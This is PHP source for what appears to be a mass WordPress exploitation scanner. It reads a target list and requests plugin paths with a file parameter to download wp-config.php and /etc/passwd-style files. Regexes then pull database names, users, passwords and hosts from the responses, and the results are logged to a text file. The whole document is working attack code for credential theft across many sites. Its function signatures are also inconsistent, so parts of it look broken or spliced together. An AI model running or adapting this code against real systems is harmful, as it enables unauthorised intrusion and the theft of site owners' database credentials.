function __listTarget($file)
{
$tgt_ = array_unique(array_filter(explode("\n", file_get_contents($file['file']))));
echo "\n\t[!] [INFO] TOTAL SITES LOADED : " . count($tgt_) . "\n\n";
foreach ($tgt_ as $url) {
echo "\n[+] [INFO] SCANNING : {$url} \n";
__plus();
$file['target'] = $url;
__request($file) . __plus();
}
}
function __subProcess($params, $target)
{
foreach ($params['exploit_model'] as $camp => $value) {
$params['exploit'] = $value;
$params['exploit_model'] = $camp;
$params['host'] = $target;
$rest = __request($params);
__plus();
if ($rest['dados_01']['http_code'] != 0) {
break;
}
}
__plus();
$_SESSION["cont_ip"]++;
if ($rest['dados_01']['http_code'] == 200) {
//FOUND FILE
$style_var = "{$_SESSION["c01"]}[ + ]__[{$_SESSION["c00"]}" . date("h:m:s") . "{$_SESSION["c05"]}";
echo "{$_SESSION["c01"]}/ {$_SESSION["cont_ip"]}{$_SESSION["c00"]}\n";
$output_view = "{$style_var} [ ! ]__[INFO][COD]: {$rest['dados_01']['http_code']}\n";
$output_view .= "{$style_var} [ ! ]__[INFO][IP/FILE]: {$params['host']}{$params['exploit']}\n";
$output_view .= "{$style_var} [ ! ]__[INFO][MODEL]: {$params['exploit_model']}\n";
$output_view .= "{$style_var} [ ! ]__[INFO][DETAILS_1]: {$rest['dados_02']}\n{$_SESSION["c00"]}";
$info_ip = __infoIP($rest['dados_01']['primary_ip']);
$output_view .= "{$style_var} [ ! ]__[INFO][DETAILS_2]: {$info_ip}\n{$_SESSION["c00"]}";
echo $output_view . __getUserPass($rest['corpo']) . $_SESSION["c00"];
$output = "COD: {$rest['dados_01']['http_code']} / IP-FILE: {$params['host']}{$params['exploit']}\nMODEL: {$params['exploit_model']}\nDETAILS_1: {$rest['dados_02']}\nDETAILS_2:{$info_ip}\n" . __getUserPass($rest['corpo']) . "{$params['line']}";
file_put_contents($params['file_output'], "{$output}\n{$params['line']}\n", FILE_APPEND);
__plus();
} else {
//FILE NOT FOUND
echo "{$_SESSION["c01"]}/ {$_SESSION["cont_ip"]}{$_SESSION["c00"]}\n";
echo "{$_SESSION["c01"]}[ + ]__[{$_SESSION["c00"]}" . date("h:m:s") . "{$_SESSION["c13"]} [X]__[NOT VULN]: {$params['host']}\n{$_SESSION["c00"]}";
}
echo $_SESSION["c07"] . $params['line'] . $_SESSION["c00"];
}
function __request($url, $plugin)
{
$objcurl = curl_init();
$caminho = NULL;
$status = array();
curl_setopt($objcurl, CURLOPT_URL, $url . $plugin);
curl_setopt($objcurl, CURLOPT_HEADER, 1);
curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($objcurl, CURLOPT_USERAGENT, "::INURLBR::/1.0.1 (compatible; MSIE 5.01; Linux 5.0)");
curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 20);
curl_setopt($objcurl, CURLOPT_TIMEOUT, 10);
$corpo = curl_exec($objcurl);
if (preg_match_all("(<b>/.*./wp-content/)", $corpo, $caminho)) {
return __request($url, "{$plugin}&file=" . str_replace('wp-content/', '', $caminho[0][0]) . "wp-config.php");
}
__plus();
if (preg_match("#DB_NAME#i", $corpo) || preg_match("#root:#i", $corpo) || preg_match("#readfile(#i", $corpo)) {
//-----------------------------------------------------------------------------
preg_match_all("(DB_NAME.*')", $corpo, $status['DB_NAME']);
preg_match_all("(DB_USER.*')", $corpo, $status['DB_USER']);
preg_match_all("(DB_PASSWORD.*')", $corpo, $status['DB_PASSWORD']);
preg_match_all("(DB_HOST.*')", $corpo, $status['DB_HOST']);
preg_match_all("(DB_CHARSET.*')", $corpo, $status['DB_CHARSET']);
#FILE PASSWORD
preg_match_all("(root:.*)", $corpo, $status['pwd1']);
preg_match_all("(sbin:.*)", $corpo, $status['pwd2']);
preg_match_all("(ftp:.*)", $corpo, $status['pwd3']);
preg_match_all("(nobody:.*)", $corpo, $status['pwd4']);
preg_match_all("(mail:.*)", $corpo, $status['pwd5']);
//-----------------------------------------------------------------------------
__plus();
$res = "\n------------------------------------------------------------------------------------------------------------------\n[0;32m0x " . date("h:m:s") . " [INFO][VULN]:: [1;37m [ " . date("d-m-Y H:i:s") . " ]\n";
$res .= "[0;32m0x " . date("h:m:s") . " [INFO][VULN][DB]::[1;37m " . $status['DB_NAME'][0][0];
$res .= "::" . $status['DB_USER'][0][0];
$res .= "::" . $status['DB_PASSWORD'][0][0];
$res .= "::" . $status['DB_HOST'][0][0];
$res .= "::" . $status['DB_CHARSET'][0][0];
$res .= preg_match("#root#i", $corpo) ? "\n[0;32m0x " . date("h:m:s") . "[INFO][VULN][FILE_PASSWORD]::[1;37m{$status['pwd1'][0][0]} - {$status['pwd2'][0][0]} - {$status['pwd3'][0][0]} - {$status['pwd4'][0][0]} - {$status['pwd5'][0][0]}[0m" : NULL;
$res .= "\n[0;32m0x " . date("h:m:s") . " [INFO][VULN][URL]::[1;37m{$url}{$plugin}[0m";
$res .= "\n------------------------------------------------------------------------------------------------------------------\n[0m";
print $res;
$res = str_replace('[1;37m', '', str_replace('[0m', '', str_replace('[0;32m', '', $res)));
file_put_contents('WORDPRESS_A_F_D.txt', "{$res}\n", FILE_APPEND);
__plus();
} else {
print "\n[1;31m0x " . date("h:m:s") . " [INFO][NOT VULN]::[1;37m {$url}{$plugin} \n[0m";
}
curl_close($objcurl);
__plus();
}
function request($action, $post = array(), &$error)
{
if (!function_exists('__request')) {
jfunc('request');
}
return __request($action, $post, $error);
}
